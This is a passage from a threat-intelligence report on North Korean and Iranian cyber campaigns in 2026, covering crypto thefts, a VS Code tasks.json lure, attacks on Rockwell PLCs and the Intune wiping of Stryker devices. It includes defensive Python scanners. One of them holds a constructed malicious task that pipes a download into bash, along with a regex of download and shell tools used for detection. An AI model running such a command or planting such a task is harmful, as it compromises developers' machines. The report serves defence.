The IBM X-Force/Flare joint research report published in March 2026 provides the most comprehensive assessment of DPRK IT worker operations to date. Approximately 100,000 North Korean IT workers deployed across 40+ countries generate approximately $500 million annually for the regime, with individual workers earning over $300,000 per year from U.S. tech companies while retaining only approximately $200 per month. The ecosystem operates through a four-tier model: recruiters screen candidates and record interviews; facilitators function as hiring managers approving placements; IT workers execute contracts using full-stack web development skills; and collaborators provide Western identities recruited via LinkedIn and GitHub. Technical tools include OConnect/NetKey (North Korean VPN connecting to Pyongyang networks), IP Messenger for peer communications, and Google Translate for all work interactions. When discovered and terminated, workers escalate through a progression: demand for access reinstatement, threatened sale of sensitive data to competitors, claimed residual system access, and handoff to DPRK APT groups. Workers operating from China tunnel through U.S. exit nodes via Astrill VPN. The Nisos operational report (March 20) documented PiKVM-based laptop farm infrastructure with approximately 40 devices, real-time AI overlay behavior during video interviews, and Tailscale mesh VPN for farm connectivity.
Bybit $1.46B — Laundering Complete
The Bybit hack (February 21, 2025) laundering was confirmed essentially complete by the one-year mark. The overwhelming majority of the $1.46 billion stolen was successfully laundered through DeFi protocols (immediate conversion), mixing services, Chinese-language OTC traders, no-KYC exchanges, and fiat conversion pathways. At least $1 billion was laundered within the first six months via suspected Chinese OTC desks. The Bybit theft accounted for 69% of all crypto-service losses industry-wide in 2025. CSIS published analysis on March 24 calling for updated U.S. crypto regulation in response. The completion of the Bybit laundering confirms DPRK has successfully converted the $1.46B into usable regime revenue, consistent with Chainalysis’s documented 45-day laundering cycle observed across 2022–2025 major thefts.
DPRK Social Engineering Evolution
The Drift Protocol attack marks a qualitative leap in DPRK social engineering sophistication. For the first time publicly documented, DPRK operatives attended cryptocurrency conferences in person—not merely engaging targets online but physically meeting and building relationships with potential victims. The investment of $1M+ in real capital as a credibility-building measure demonstrates willingness to commit significant financial resources to individual operations, a departure from the high-volume, low-investment phishing campaigns that historically characterized DPRK operations. The use of Apple TestFlight for malware delivery represents adaptation to mobile ecosystems, while the VS Code tasks.json technique (adopted December 2025) exploits the implicit trust developers place in code repositories. The six-month operational timeline from initial conference contact to execution demonstrates patience previously associated with state intelligence services conducting human intelligence operations rather than cybercrime groups. This evolution suggests DPRK cyber operations are increasingly guided by intelligence tradecraft principles rather than purely technical exploitation.
Contagious Interview / Famous Chollima — Ongoing Campaigns
The Contagious Interview campaign continues operating multiple parallel techniques simultaneously. The March 2, 2026 “StegaBin” variant deployed 26 malicious npm packages using character-level steganography in Pastebin for C2 encoding. The Lazarus graphalgo campaign (active since May 2025) uses fake company “Veltrix Capital” and GitHub repositories containing malicious npm/PyPI dependencies. Secondary payloads target MetaMask extensions and crypto wallet data. BeaverTail, InvisibleFerret, and OtterCookie malware families remain active in the Contagious Interview pipeline. SentinelOne documented 230+ victims between January–March 2025. The group actively monitors CTI platforms (VirusTotal, Validin, Maltrail) for infrastructure exposure detection, demonstrating operational security awareness that complicates defender tracking efforts.
APT37/ScarCruft and Kimsuky — Status
APT37 (ScarCruft, Reaper, Ruby Sleet) launched the “Ruby Jumper” campaign documented February 27, 2026, deploying five previously undocumented tools targeting air-gapped systems via Zoho WorkDrive C2 and USB implants. No new APT37 disclosures emerged in the April 3–10 window. Kimsuky (Emerald Sleet, APT43) continues its quishing (QR-code phishing) campaign against U.S. think tanks, NGOs, and government entities as documented in FBI FLASH AC-000001-MW (January 8, 2026). The campaign uses embedded QR codes routing to Microsoft 365/Okta/VPN credential harvesting pages with session-token theft for MFA bypass. Kimsuky remains the primary DPRK espionage vector targeting policy and intelligence communities.
The Drift Protocol forensic postmortem published April 5 also revealed two distinct infection vectors. First, a contributor cloned a code repository shared by the fake trading group to deploy a frontend for their vault; the repository contained a malicious VS Code tasks.json file with a runOn: folderOpen auto-execution trigger—a Contagious Interview technique adopted by DPRK actors starting December 2025 that prompted Microsoft to add security controls in VS Code versions 1.109 and 1.110. Second, a contributor was persuaded to download a wallet product via Apple TestFlight (beta test application), likely delivering malware through the beta distribution channel. The combination of in-person social engineering, legitimate platform abuse, and code repository weaponization represents the most multi-vector DPRK social engineering operation publicly documented.
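The `tasks.json` vector can be caught before a folder is opened, because the trigger is a static property of a file in the checkout. The following is an added example (not Microsoft's, VS Code's or Drift's code) that walks a cloned repository for `.vscode/tasks.json` files, parses them as JSONC (VS Code accepts comments and trailing commas, which plain `json.loads` rejects), reports every task with `runOptions.runOn` set to `folderOpen`, and marks commands that fetch or evaluate remote content. The sample `tasks.json` is constructed for this example, including its `example.invalid` URL.

```python
import json
import os
import re
import tempfile
from typing import Dict, List

DANGEROUS_CMD = re.compile(
    r"\b(curl|wget|Invoke-WebRequest|iwr|iex|bash -c|sh -c|python -c|node -e|base64)\b|-enc\b", re.I)


def strip_jsonc(text: str) -> str:
    """Remove // and /* */ comments outside strings, then trailing commas before } or ]."""
    out, i, n, in_str = [], 0, len(text), False
    while i < n:
        c = text[i]
        if in_str:
            out.append(c)
            if c == "\\" and i + 1 < n:   # keep escaped character verbatim
                out.append(text[i + 1])
                i += 1
            elif c == '"':
                in_str = False
        elif c == '"':
            in_str = True
            out.append(c)
        elif text.startswith("//", i):
            j = text.find("\n", i)
            i = n if j < 0 else j
            continue
        elif text.startswith("/*", i):
            j = text.find("*/", i + 2)
            i = n if j < 0 else j + 2
            continue
        else:
            out.append(c)
        i += 1
    return re.sub(r",(\s*[}\]])", r"\1", "".join(out))


def parse_jsonc(text: str):
    return json.loads(strip_jsonc(text))


def auto_run_tasks(tasks_json: str) -> List[Dict[str, object]]:
    """Tasks that VS Code will execute when the folder is opened."""
    findings = []
    for task in parse_jsonc(tasks_json).get("tasks", []):
        if (task.get("runOptions") or {}).get("runOn") != "folderOpen":
            continue
        cmd = " ".join([str(task.get("command", ""))] + [str(a) for a in task.get("args", [])])
        for os_key in ("windows", "linux", "osx"):           # per-platform overrides
            cmd += " " + str((task.get(os_key) or {}).get("command", ""))
        findings.append({"label": task.get("label", "<unnamed>"), "type": task.get("type", ""),
                         "command": cmd.strip(), "suspicious": bool(DANGEROUS_CMD.search(cmd))})
    return findings


def scan_repo(root: str) -> List[Dict[str, object]]:
    """Find .vscode/tasks.json at any depth (nested folders can be opened as workspaces too)."""
    results = []
    for dirpath, dirs, files in os.walk(root):
        dirs[:] = [d for d in dirs if d not in (".git", "node_modules")]
        if os.path.basename(dirpath) == ".vscode" and "tasks.json" in files:
            path = os.path.join(dirpath, "tasks.json")
            with open(path, errors="ignore") as f:
                results.extend(dict(finding, file=path) for finding in auto_run_tasks(f.read()))
    return results


# Constructed sample: reads like harmless dev setup, runs on folder open, pipes a download into bash.
SAMPLE_TASKS_JSON = """{
  // dev environment bootstrap
  "version": "2.0.0",
  "tasks": [
    {
      "label": "install deps",
      "type": "shell",
      "command": "bash -c \\"curl -fsSL https://example.invalid/setup.sh | bash\\"",
      "runOptions": { "runOn": "folderOpen" },
    },
    { "label": "build", "type": "shell", "command": "npm run build" }
  ]
}
"""


def run_sample() -> List[Dict[str, object]]:
    with tempfile.TemporaryDirectory() as tmp:
        os.makedirs(os.path.join(tmp, ".vscode"))
        with open(os.path.join(tmp, ".vscode", "tasks.json"), "w") as f:
            f.write(SAMPLE_TASKS_JSON)
        return scan_repo(tmp)


if __name__ == "__main__":
    for finding in run_sample():
        print(finding)
```

Run `scan_repo()` against a checkout before opening it, or wire it into a pre-clone hook. Treat any `folderOpen` task in a repository you did not author as hostile until read; the suspicious-command heuristic only prioritises, and a task that merely runs `npm install` still executes whatever lifecycle scripts the dependency tree carries.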
Circle CCTP Controversy
The use of Circle’s Cross-Chain Transfer Protocol to bridge $230M+ of stolen USDC from Solana to Ethereum, with Circle requiring six or more hours to freeze funds after notification, triggered significant industry criticism. By the time Circle acted, the attacker had already converted most holdings to ETH and routed portions through Hyperliquid and Binance. The incident highlights the tension between stablecoin issuers’ centralized control capabilities and their operational response times during active theft. Multiple DeFi protocols have called for revised incident response SLAs with stablecoin issuers, and the Drift incident may accelerate industry-wide adoption of Multi-Party Computation (MPC) wallets and automated freeze mechanisms.
Konni/Opal Sleet (TA406) — APAC Targeting
DPRK’s Konni group (Opal Sleet, TA406) was noted during this period for an ongoing campaign using AI-generated PowerShell malware targeting blockchain and cryptocurrency developers across Asia-Pacific (Japan, Australia, India). Delivery vectors include malicious Google Ads (search hijacking for developer tools) and Discord communities distributing fake software updates. The malware chain employs AI-written PowerShell backdoors (reportedly generated with ChatGPT or Claude-class tools) for reconnaissance, persistence, credential theft, screenshot capture, keylogging, and exfiltration. The campaign’s use of AI-generated malware represents an acceleration trend consistent with the broader DPRK adoption of agentic AI tools for malware iteration and LLM jailbreaking documented in the IBM X-Force and Flare research.
2.3.3 TTPs
DPRK TTPs have reached a new sophistication plateau with the Drift Protocol operation. The attack sequence—in-person conference attendance, real capital investment, multi-month rapport building, VS Code weaponization, Solana durable nonce exploitation—represents social engineering at a level previously associated only with state intelligence services conducting human intelligence operations. Supply chain attacks continue to evolve with the Axios compromise demonstrating pre-staged multi-branch targeting (both 0.x and 1.x branches hit within 40 minutes). SILKBELL’s anti-forensic self-deletion and WAVESHAPER.V2’s cross-platform persistence reflect mature operational security. IT worker operations now employ Faceswap AI, agentic AI for malware generation, and LLM jailbreaking.
2.4 Iran
2.4.1 Strategic Overview
Iran’s cyber posture entered a transformative phase during this period. The April 7 six-agency joint advisory confirmed what analysts had warned: Iranian-linked actors have achieved operational access to U.S. critical infrastructure control systems and are actively manipulating them. CSIS upgraded its assessment of Iran’s cyber doctrine from “episodic” to “sustained strategic,” reflecting a permanent shift in which cyberspace is treated as an extension of state power against critical infrastructure. The post-Hormuz ceasefire environment paradoxically elevates cyber risk: Handala explicitly declared the cyber war independent of military truces, and experts predict Iranian groups will pivot to high-profile U.S. targets during the kinetic lull. Iran’s internet blackout reached Day 41 (960+ hours)—the longest nationwide shutdown ever recorded—but external cells continue operating at elevated tempo via Starlink and Telegram coordination.
2.4.2 Key Developments
• SIX-AGENCY JOINT ADVISORY (April 7): FBI, CISA, NSA, DOE, EPA, and U.S. Cyber Command confirmed active Iranian exploitation of internet-facing Rockwell Automation Allen-Bradley PLCs across U.S. water/wastewater, energy, and municipal facilities. Operational disruption confirmed by EPA. Attackers use CVE-2021-22681 (Studio 5000 Logix Designer authentication bypass) and Living-off-the-Land in OT with Rockwell’s own legitimate tools. 5,219 internet-exposed Rockwell PLCs identified globally, 74.6% in the U.S. (Censys, April 9).
• Hormuz Deadline Aftermath: Deadline passed April 6 without deal. Trump extended to April 7. Pakistan brokered two-week ceasefire April 7–8. Iran re-closed Hormuz April 8 citing Israeli strikes in Lebanon (“Operation Eternal Darkness”). Only approximately 15 ships/day transiting versus 135 pre-crisis.
• Handala Ceasefire Declaration: Temporarily paused U.S. attacks but declared “The cyber war did not begin with the military conflict, and it will not end with any military ceasefire.” Continued operations against Israel.
• CSIS upgraded Iran’s posture from “episodic” to “sustained strategic cyber doctrine” (April 7). Cyber operations are now Iran’s primary retaliation vector as conventional military capabilities are degraded.
• Handala/Kash Patel Email Breach (March 27): Published 300+ emails from FBI Director’s personal account. $10M Rewards for Justice bounty announced.
• APT Iran 375TB Lockheed Martin Claim: Listed for sale at $598M+. Verification status disputed; doxxing of 28 Lockheed Martin engineers independently confirmed.
• IRGC 18 Tech Company Target List (March 31): Expanded to Apple, Microsoft, Google, Meta, Nvidia, and 13 others. No confirmed large-scale executions during the period.
• Undersea Cable Scissors Strategy + Bab al-Mandeb expansion threat (April 6). IRGC confirmed cables “will not be spared from attack.”
• Stryker full recovery confirmed Day 21 (April 1). 200,000+ devices wiped across 79 countries via Microsoft Intune abuse.
• Iran Internet Blackout Day 41 (960+ hours, longest nationwide shutdown ever recorded). Government signaled permanent “Absolute Digital Isolation” policy.
• Satellite jamming tower destroyed near Shiraz briefly restored satellite connectivity.
• MuddyWater active on U.S. bank, airport, defense supplier networks with Dindoor and Fakeset backdoors.
• CyberAv3ngers OT scanning of cameras, PLCs, and industrial equipment.
• Cotton Sandstorm Gulf operations resumed, including Qatari LNG facility targeting.
• Pioneer Kitten ransomware collaboration with financial incentives.
• Approximately 60 hacktivist groups active via Electronic Operations Room coordination.
2.4.2a Detailed Campaign Analysis
Six-Agency Joint Advisory — Technical Details
The April 7 joint advisory (AA26-097A) represents the most significant U.S. government ICS/OT threat disclosure of the reporting period. Six agencies—FBI, CISA, NSA, DOE, EPA, and U.S. Cyber Command—confirmed that Iranian-affiliated APT actors are actively exploiting internet-facing Rockwell Automation Allen-Bradley programmable logic controllers across U.S. water/wastewater, energy, and municipal facilities. The advisory confirmed “operational disruption and financial loss” at multiple unnamed sites, with manipulations of Human Machine Interface (HMI) and SCADA display data. The attack methodology exploits CVE-2021-22681, a Rockwell Studio 5000 Logix Designer authentication bypass that allows non-Rockwell applications to connect with Logix controllers by discovering a cryptographic key. Attackers employ Living-off-the-Land in OT environments, using Rockwell’s own legitimate Studio 5000 software to interact with project files and manipulate SCADA displays—mirroring the Stryker MDM abuse where no custom malware was deployed. Confirmed targeted device families include CompactLogix and Micro850. Attackers are also probing Modbus (port 502) and Siemens S7 (port 102), indicating multi-vendor OT reconnaissance. Censys research (April 9) identified 5,219 internet-exposed hosts globally responding to EtherNet/IP (port 44818), with the United States accounting for 74.6% (3,891 devices). Notably, 49.1% are on Verizon Business cellular networks, meaning they reach the internet via cellular modems for remote field connectivity. Many MicroLogix 1400 devices run end-of-sale firmware with no ongoing security support. Government recommendations include enabling MFA on all remote OT access, removing PLCs from public internet, setting physical mode switches to RUN position, and auditing logs for inbound traffic on TCP 44818, 2222, 102, 502, and 22.
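The advisory's logging recommendation is straightforward to operationalise, and the Censys finding about cellular connectivity has a consequence for how it is done: a PLC behind a carrier modem typically sits on a CGNAT (100.64.0.0/10) address, which is not RFC1918 and is reachable from the carrier side. The script below is an added example (not CISA, Censys or Rockwell tooling) that audits constructed flow records (field names `ts,src,dst,dport,proto,direction` are assumptions) for inbound TCP to the five ports named above from any source that is neither internal nor an allowlisted engineering host, ranks targets by how many distinct OT services one source probed, and builds the 24-byte EtherNet/IP ListIdentity request that inventory scanners send to port 44818, for use against your own assets.

```python
import csv
import io
import ipaddress
import struct
from collections import defaultdict
from typing import Dict, List

# Ports from the advisory's logging recommendation and the protocol each carries.
OT_PORTS = {44818: "EtherNet/IP (CIP explicit messaging)", 2222: "EtherNet/IP (CIP implicit I/O)",
            102: "Siemens S7 / ISO-TSAP", 502: "Modbus/TCP", 22: "SSH"}
INTERNAL_NETS = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]
CGNAT = ipaddress.ip_network("100.64.0.0/10")

# Constructed flow records. Sources use documentation ranges as stand-ins for public IPs;
# the two PLCs sit on carrier CGNAT addresses, as the Censys finding describes.
SAMPLE_FLOWS = """ts,src,dst,dport,proto,direction
2026-04-08T01:12:03Z,198.51.100.23,100.64.12.7,44818,tcp,inbound
2026-04-08T01:12:09Z,198.51.100.23,100.64.12.7,44818,tcp,inbound
2026-04-08T01:13:40Z,198.51.100.23,100.64.12.7,2222,tcp,inbound
2026-04-08T02:05:11Z,203.0.113.9,100.64.12.9,502,tcp,inbound
2026-04-08T02:05:12Z,203.0.113.9,100.64.12.9,102,tcp,inbound
2026-04-08T03:00:00Z,10.20.0.15,10.20.5.40,44818,tcp,inbound
2026-04-08T03:10:00Z,10.20.5.40,10.20.0.15,443,tcp,outbound
"""


def is_external(ip: str) -> bool:
    """RFC1918 counts as internal. CGNAT and documentation ranges do not (deliberately)."""
    addr = ipaddress.ip_address(ip)
    return not any(addr in net for net in INTERNAL_NETS)


def audit_flows(csv_text: str, engineering_hosts=frozenset()) -> List[Dict[str, object]]:
    """Inbound TCP to an OT port from a source that is neither internal nor an allowed engineering host."""
    findings = []
    for row in csv.DictReader(io.StringIO(csv_text)):
        port = int(row["dport"])
        if row["direction"] != "inbound" or row["proto"] != "tcp" or port not in OT_PORTS:
            continue
        if row["src"] in engineering_hosts or not is_external(row["src"]):
            continue
        findings.append({"ts": row["ts"], "src": row["src"], "dst": row["dst"], "port": port,
                         "service": OT_PORTS[port],
                         "dst_on_cgnat": ipaddress.ip_address(row["dst"]) in CGNAT})
    return findings


def summarize(findings: List[Dict[str, object]]) -> Dict[str, Dict[str, int]]:
    """Per target: distinct OT services touched (multi-vendor recon shows as >1) and distinct sources."""
    ports, sources = defaultdict(set), defaultdict(set)
    for f in findings:
        ports[f["dst"]].add(f["port"])
        sources[f["dst"]].add(f["src"])
    return {dst: {"services_probed": len(ports[dst]), "external_sources": len(sources[dst])} for dst in ports}


def enip_list_identity_request() -> bytes:
    """EtherNet/IP encapsulation header for ListIdentity (command 0x0063), 24 bytes, no payload.
    Fields: command, length, session handle, status, sender context (8 bytes), options."""
    return struct.pack("<HHII8sI", 0x0063, 0, 0, 0, b"\x00" * 8, 0)


if __name__ == "__main__":
    hits = audit_flows(SAMPLE_FLOWS)
    for f in hits:
        print(f)
    print(summarize(hits))
    print("ListIdentity request:", enip_list_identity_request().hex())
```

Feed `audit_flows()` with exports from the firewall or NetFlow collector in front of the OT segment and treat every finding as a device that should not be internet-facing at all; the allowlist exists so that the engineering workstation that legitimately uses Studio 5000 does not drown the report. The ListIdentity bytes, sent over TCP to 44818, elicit vendor, product code, revision and serial number from a responding controller, which is how to build the internal inventory to compare against the external exposure.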
Hormuz Timeline — April 5–10 Detail
The final pre-deadline period saw escalating brinkmanship. On April 5, Pakistan introduced a 45-day two-phased ceasefire framework which Iran rejected, instead proposing its own 10-point plan. Pre-war daily transit figures differ by source (70–80 ships per day in the data cited here, against the 135-ship baseline used elsewhere in this report); by April 5 traffic had collapsed to 8 transits (4 cargo, 4 tankers) and April 6 saw only 10 transits. Iran rejected the April 6 deadline outright, insisting on a permanent end to hostilities, lifting of all sanctions, and a structured safe-passage regime. On April 7, Trump posted “A whole civilization will die tonight” as an ultimatum, while the six-agency cyber advisory was simultaneously published. Hours before the midnight deadline, Pakistan PM Sharif announced a two-week ceasefire. However, Iran fired four waves of ballistic missiles at Israel, 17 missiles and 35 drones at the UAE, and struck targets in Kuwait and Qatar surrounding the ceasefire announcement. On April 8, Iran re-closed Hormuz citing Israeli strikes in Lebanon under “Operation Eternal Darkness,” imposing tolls exceeding $1 million per ship. By April 10, only approximately 15 ships per day transited versus the 135 pre-crisis baseline. The ceasefire’s structural fragility is evidenced by mutually exclusive victory narratives and immediate Israeli violations through continued airstrikes in Lebanon.
Hacktivist Ecosystem — 60+ Active Groups
The Electronic Operations Room established February 28 continues to coordinate approximately 60 pro-Iranian hacktivist groups via Telegram. Key groups include: Handala/Void Manticore (MOIS-attributed, confirmed wiper and psychological operations); CyberAv3ngers (IRGC Cyber-Electronic Command, OT/ICS scanning); Cotton Sandstorm/Emennet Pasargad (IRGC-linked, Gulf operations); Pioneer Kitten/Fox Kitten (ransomware affiliate partnerships); FAD Team/Fatimiyoun (SCADA/PLC claims); Cyber Islamic Resistance (RipperSec, Cyb3rDrag0nzz); Cyber Isnaad Front (newly identified telecom targeting); 313 Team (Iraq-based, Kuwait targeting); DieNet (Gulf airport and banking DDoS); Sylhet Gang-SG (Saudi ministry claims); Dark Storm Team (Israeli banking DDoS); Evil Markhors (Israeli banking); and APT Iran (data exfiltration and monetization). Pro-Russian groups actively supporting Iranian operations include NoName057(16), Cardinal, Russian Legion, Z-Pentest Alliance, and DDoSia Project. While most hacktivist claims remain unverified, the collective volume creates persistent pressure on defender resources across Israeli, Gulf, and Western targets.
Undersea Cable Threat — “Scissors Strategy”
Iran’s threat to undersea cable infrastructure escalated significantly during the period. On March 28, a senior IRGC commander confirmed that critical undersea cable infrastructure in the Hormuz corridor “will not be spared from attack.” On April 6, Iran extended threats to Bab al-Mandeb, the narrow strait between Yemen and the Horn of Africa, creating risk to a second global digital chokepoint. Approximately 17 submarine cable systems operate in or transit the Persian Gulf, with 12 having segments in waters where IRGC has declared active military operations. The Persian Gulf is approximately 35 meters deep at its shallowest—within IRGC midget submarine and combat diver range. Cables at risk include AAE-1 (the longest submarine cable system connecting Southeast Asia through Persian Gulf to Africa and Europe), FALCON (linking UAE, Oman, Qatar, Kuwait, Bahrain, India), Gulf Bridge International Cable System, Europe India Gateway, SEA-ME-WE 6, FLAG, Fibre in Gulf, TGN-Gulf, and Meta’s 2Africa Pearls extension. Meta was forced to suspend work on 2Africa Pearls with the cable-laying vessel Ile de Batz stranded off Saudi Arabia under force majeure. Google and Meta activated contingency rerouting plans, and India’s Department of Telecommunications directed operators to prepare contingency plans.
Stryker Corporation — Full Recovery Analysis
Stryker confirmed full operational recovery on April 1, Day 21 following the March 11 wiper attack. The Handala/Void Manticore attack weaponized Microsoft Intune to issue bulk factory reset commands to 200,000+ devices globally across 79 countries without deploying a single line of traditional malware, evading endpoint detection and response tools entirely. ProArch reported up to 95% of devices in some departments were erased before defenders could react. The attack confirmed the “Era of Identity Weaponization” shift identified by Unit 42, where Iranian groups move from compiled wiper malware to Living-off-the-Land abuse of management planes. Stryker’s investigation with Palo Alto Networks Unit 42 identified a concealment-focused malicious file used to hide attacker activity—not a self-propagating wiper in the traditional sense. The company’s Q1 2026 earnings report due April 30 will provide the first financial quantification of the attack’s cost. The Microsoft Intune attack vector remains relevant across the healthcare sector, where similar MDM environments are widespread and often configured with insufficient multi-admin approval controls.
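The Intune abuse described above is detectable in the management plane's own audit trail: a legitimate administrator retires a few devices over a day, while an attacker issuing bulk factory resets produces a burst of wipe commands from one account in minutes. The following is an added example (not Stryker's, Unit 42's or Microsoft's code) of a sliding-window burst detector over constructed audit records; the record field names and the operation names are assumptions for this example, not a vendor schema.

```python
"""Burst detection for MDM device-wipe commands over constructed audit records.

Added example, not code from the page or the vendors it names. The record
shape (activityDateTime, actor, operation, device) is a simplified, constructed
one; map your MDM audit export onto it before use.
"""
from collections import defaultdict, deque
from datetime import datetime, timedelta, timezone

# Operations that erase or remove a managed device (assumed naming).
WIPE_OPERATIONS = {"wipe", "factoryreset", "retire", "delete"}


def _constructed_events():
    """Constructed audit trail: a helpdesk admin retiring two devices 45 minutes
    apart, one compromised admin account issuing eight wipes in under three
    minutes, and an unrelated sync event mixed in."""
    base = datetime(2026, 3, 11, 2, 13, tzinfo=timezone.utc)
    events = [
        {"activityDateTime": "2026-03-11T09:00:00Z", "actor": "helpdesk@contoso.example",
         "operation": "retire", "device": "LAPTOP-0412"},
        {"activityDateTime": "2026-03-11T09:45:00Z", "actor": "helpdesk@contoso.example",
         "operation": "retire", "device": "LAPTOP-0413"},
        {"activityDateTime": "2026-03-11T02:12:30Z", "actor": "itadmin@contoso.example",
         "operation": "syncDevice", "device": "LAPTOP-0001"},
    ]
    for i in range(8):
        when = base + timedelta(seconds=20 * i)
        events.append({"activityDateTime": when.strftime("%Y-%m-%dT%H:%M:%SZ"),
                       "actor": "itadmin@contoso.example",
                       "operation": "wipe", "device": f"LAPTOP-{1000 + i}"})
    return events


SAMPLE_EVENTS = _constructed_events()


def parse_time(value):
    """Parse an ISO-8601 UTC timestamp ending in 'Z' into an aware datetime."""
    return datetime.fromisoformat(value.replace("Z", "+00:00"))


def detect_bulk_wipes(events, threshold=5, window_minutes=10):
    """Return one alert per actor whose wipe-type operations reach `threshold`
    within any sliding window of `window_minutes`. The alert fires at the event
    that crosses the threshold, so `count` is the number of wipes in the window
    at that moment; a normal admin retiring a handful of devices never trips it."""
    window = timedelta(minutes=window_minutes)
    recent = defaultdict(deque)   # actor -> deque of (time, device) inside the window
    alerts, alerted = [], set()
    for ev in sorted(events, key=lambda e: parse_time(e["activityDateTime"])):
        if ev["operation"].lower() not in WIPE_OPERATIONS:
            continue
        actor, when = ev["actor"], parse_time(ev["activityDateTime"])
        queue = recent[actor]
        queue.append((when, ev["device"]))
        while queue and when - queue[0][0] > window:   # slide the window forward
            queue.popleft()
        if len(queue) >= threshold and actor not in alerted:
            alerted.add(actor)
            alerts.append({
                "actor": actor,
                "count": len(queue),
                "window_start": queue[0][0].isoformat(),
                "window_end": when.isoformat(),
                "devices": [device for _, device in queue],
            })
    return alerts


if __name__ == "__main__":
    for alert in detect_bulk_wipes(SAMPLE_EVENTS):
        print(f"ALERT {alert['actor']}: {alert['count']} wipes between "
              f"{alert['window_start']} and {alert['window_end']}")
```

Tune the threshold to the tenant's normal decommissioning rate; the point is that a single account wiping devices faster than any human change process allows is the signal, independent of any malware artefact.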
MuddyWater/Seedworm — Active U.S. Network Intrusions
MuddyWater (Seedworm, Mango Sandstorm), attributed to Iran’s MOIS, maintains active access to multiple U.S. organizational networks as of this reporting period. Broadcom/Symantec confirmed activity on a U.S. bank, U.S. airport, Canadian nonprofit, and the Israeli arm of a U.S. defense/aerospace software supplier since February 2026. New backdoors deployed include Dindoor (JavaScript on Deno runtime, enabling evasion of security software that doesn’t monitor Deno processes) and Fakeset (Python-based, using legitimate Python interpreters in a LOTL approach). Both backdoors use digital certificates signed by “Amy Cherne” and “Donald Gay”—the latter previously associated with MuddyWater’s Stagecomp and Darkcomp malware. Data exfiltration routes through Wasabi and Backblaze cloud storage to blend with normal corporate traffic. The parallel Operation Olalampo campaign spans MENA, Turkey, and Africa with overlapping infrastructure and new malware families: GhostFetch, GhostBackDoor, HTTP_VIP, and the Rust-based CHAR backdoor. UK NCSC issued an alert confirming Iranian state actors “almost certainly currently maintain at least some capability to conduct cyber activity” despite infrastructure degradation.
CyberAv3ngers — ICS/OT Active Operations
CyberAv3ngers, attributed to the IRGC Cyber-Electronic Command (IRGC-CEC), is the primary actor behind the PLC exploitation described in the April 7 joint advisory. The group’s methodology in the current campaign mirrors its 2023–2024 attacks on Unitronics Vision/Samba PLCs during the Gaza conflict, now expanded to Rockwell Automation Allen-Bradley devices. The group is simultaneously conducting active scanning of internet-facing industrial cameras (Dahua, Hikvision) and OT devices for reconnaissance and battle-damage assessment, exploiting CVE-2017-7921, CVE-2023-6895, CVE-2021-36260, CVE-2025-34067, and CVE-2021-33044. A Trellix analysis noted an operational pause between January 8–27 coinciding with the internet blackout, providing “compelling circumstantial evidence” of state coordination—the group’s activity resumed when external connectivity was partially restored via Starlink. Primary targets include water/wastewater facilities (Unitronics PLC-equipped), energy infrastructure, food and beverage processing, and healthcare facilities.
Cotton Sandstorm/Emennet Pasargad — Gulf Energy Targeting
Cotton Sandstorm (Emennet Pasargad, also known as Aria Sepehr Ayandehsazan), an IRGC-linked entity, resumed Gulf operations in March 2026 after reactivating old hacktivist personas. Security researchers confirmed targeted operations against Qatari LNG facilities including Ras Laffan (the world’s largest LNG production site) and Mesaieed (Qatar’s industrial and petrochemical city). TTPs include ASPX web shell deployment, wiper and fake-ransomware operations, LOTL post-exploitation, reconnaissance tunneling, and WezRat infostealer deployment. Qatar hosts Al Udeid Air Base, a major U.S. military hub, making Qatari LNG targeting simultaneously a threat to U.S. military logistics, global LNG supply, and a punitive signal to Qatar for hosting U.S. forces. The EU imposed sanctions on Emennet Pasargad in March 2026 for the 2024 Paris Olympics attacks including French database breaches, Swedish SMS disruption, and disinformation operations.
Pioneer Kitten/Fox Kitten — Ransomware Affiliate Model
Pioneer Kitten (Fox Kitten, Lemon Sandstorm), assessed as IRGC-linked, continues operating a ransomware collaboration model with affiliates including NoEscape, RansomHouse, and ALPHV/BlackCat. The model has evolved during the conflict period: state-sponsored actors now offer financial incentives to ransomware operators targeting U.S. and Israeli organizations, broadening the collaborative model beyond technical access brokering to include direct financial subsidization. The group exploits a persistent vulnerability inventory including CVE-2019-19781 and CVE-2023-3519 (Citrix NetScaler), CVE-2022-1388 (F5 BIG-IP), CVE-2024-21887 (Ivanti VPN), CVE-2024-3400 (Palo Alto PAN-OS), and CVE-2024-24919 (Check Point Security Gateway). Cloud infrastructure abuse—using compromised cloud resources for follow-on operations against U.S. academic and defense sector entities—represents an evolution in the group’s operational model.
2.4.3 TTPs
The dominant TTP evolution during this period is Living-off-the-Land in OT environments. The six-agency advisory confirmed attackers are using Rockwell’s own Studio 5000 Logix Designer software to interact with PLC project files and manipulate SCADA displays—mirroring the Stryker attack’s weaponization of Microsoft Intune. This LOTL-in-OT approach uses no custom malware, leveraging vendor tools to blend into legitimate workflows. Additional Iranian TTPs include: AitM phishing against Microsoft login portals for Intune admin credential theft; Telegram C2 for hacktivist coordination and malware delivery; multi-stage malware chains with anti-forensic cleanup; exploitation of internet-connected cameras for battle damage assessment; and financially incentivized ransomware affiliate partnerships.
2.4.5 Assessment and Outlook
Iran’s cyber threat is assessed as CRITICAL and structurally escalating regardless of ceasefire status. The six-agency advisory confirming active PLC exploitation at U.S. facilities represents the most significant ICS compromise disclosure since the CyberAv3ngers’ 2023 Unitronics campaign. The ceasefire paradoxically concentrates threat activity in the cyber domain as kinetic options diminish. Handala’s explicit declaration that cyber operations will continue independently of military truces should be treated as a strategic commitment, not rhetoric. The ceasefire expiration window (approximately April 21–22) represents the highest near-term escalation trigger. Should negotiations in Islamabad fail, expect immediate resumption of wiper operations against U.S. organizations at Stryker scale or above. The undersea cable threat remains credible but conditional: it is likely to be executed if Iran assesses it is losing leverage during negotiations.
PART 3: CROSS-DOMAIN ANALYSIS AND GEOPOLITICAL CONTEXT
3.1 Post-Hormuz Deadline Assessment
